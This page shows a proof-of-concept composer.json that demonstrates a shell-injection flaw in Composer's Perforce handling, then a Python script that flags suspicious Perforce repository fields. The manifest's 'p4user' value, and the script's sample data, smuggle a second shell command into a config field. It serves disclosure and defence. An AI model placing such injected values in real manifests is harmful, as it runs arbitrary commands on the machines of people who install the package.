POC / composer.json.vector2 VECTOR2
{
    "name": "poc/4fcc13d4-perforce-shell-injection",
    "description": "PoC: triggers shell injection in Perforce generateP4Command (fixed in 4fcc13d42). Affects Composer <= 2.9.5 (CVE-2026-40261). Three injection vectors are demonstrated via repository config values that were previously interpolated unsanitized into shell command strings.",
    "require": {
        "vendor/some-perforce-package": "dev-main"
    },
    "repositories": [
        {
            "comment": "VECTOR 2 — inject via 'p4user' (becomes -u <user>). Old code appended user value directly into the command string.",
            "type": "perforce",
            "url": "127.0.0.1:1666",
            "depot": "depot",
            "branch": "main",
            "p4user": "user; touch /tmp/pwned_via_user #"
        }
    ],
    "minimum-stability": "dev"
}
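
A pre-install triage check for manifests like the one above, added here as an example (it is not part of the PoC repository or of Composer): it flags `perforce` repository entries whose `url`, `depot`, `branch` or `p4user` values contain anything outside a conservative character allowlist. The allowlist, the function name `audit_manifest` and the sample data are assumptions made for this example.

```python
import json
import re

# Assumption for this example: a conservative allowlist for Perforce
# host:port, depot, branch and user values. Anything else is reported.
SAFE_VALUE = re.compile(r"[A-Za-z0-9._:/@+-]*")
# Fields of a "perforce" repository entry that appear in the manifest above.
CHECKED_FIELDS = ("url", "depot", "branch", "p4user")


def audit_manifest(text):
    """Return (repo_index, field, value) for each suspicious perforce field."""
    manifest = json.loads(text)
    repos = manifest.get("repositories", [])
    # Composer also accepts "repositories" as an object keyed by name.
    if isinstance(repos, dict):
        repos = list(repos.values())
    findings = []
    for index, repo in enumerate(repos):
        if not isinstance(repo, dict) or repo.get("type") != "perforce":
            continue
        for field in CHECKED_FIELDS:
            value = repo.get(field)
            # fullmatch avoids the trailing-newline gap of a "$" anchor.
            if isinstance(value, str) and not SAFE_VALUE.fullmatch(value):
                findings.append((index, field, value))
    return findings


# Constructed sample: entry 0 carries the p4user value shown on this page,
# entry 1 is a benign perforce entry, entry 2 is not a perforce repository.
SAMPLE = json.dumps({
    "repositories": [
        {"type": "perforce", "url": "127.0.0.1:1666", "depot": "depot",
         "branch": "main", "p4user": "user; touch /tmp/pwned_via_user #"},
        {"type": "perforce", "url": "p4.example.test:1666", "depot": "depot",
         "branch": "main", "p4user": "build-bot"},
        {"type": "vcs", "url": "https://example.test/a b.git"},
    ]
})

if __name__ == "__main__":
    for index, field, value in audit_manifest(SAMPLE):
        print(f"repositories[{index}].{field}: suspicious value {value!r}")
```

A clean result only means these four fields look ordinary; the manifest's description lists Composer <= 2.9.5 as affected, so the check complements running a fixed version and does not replace it.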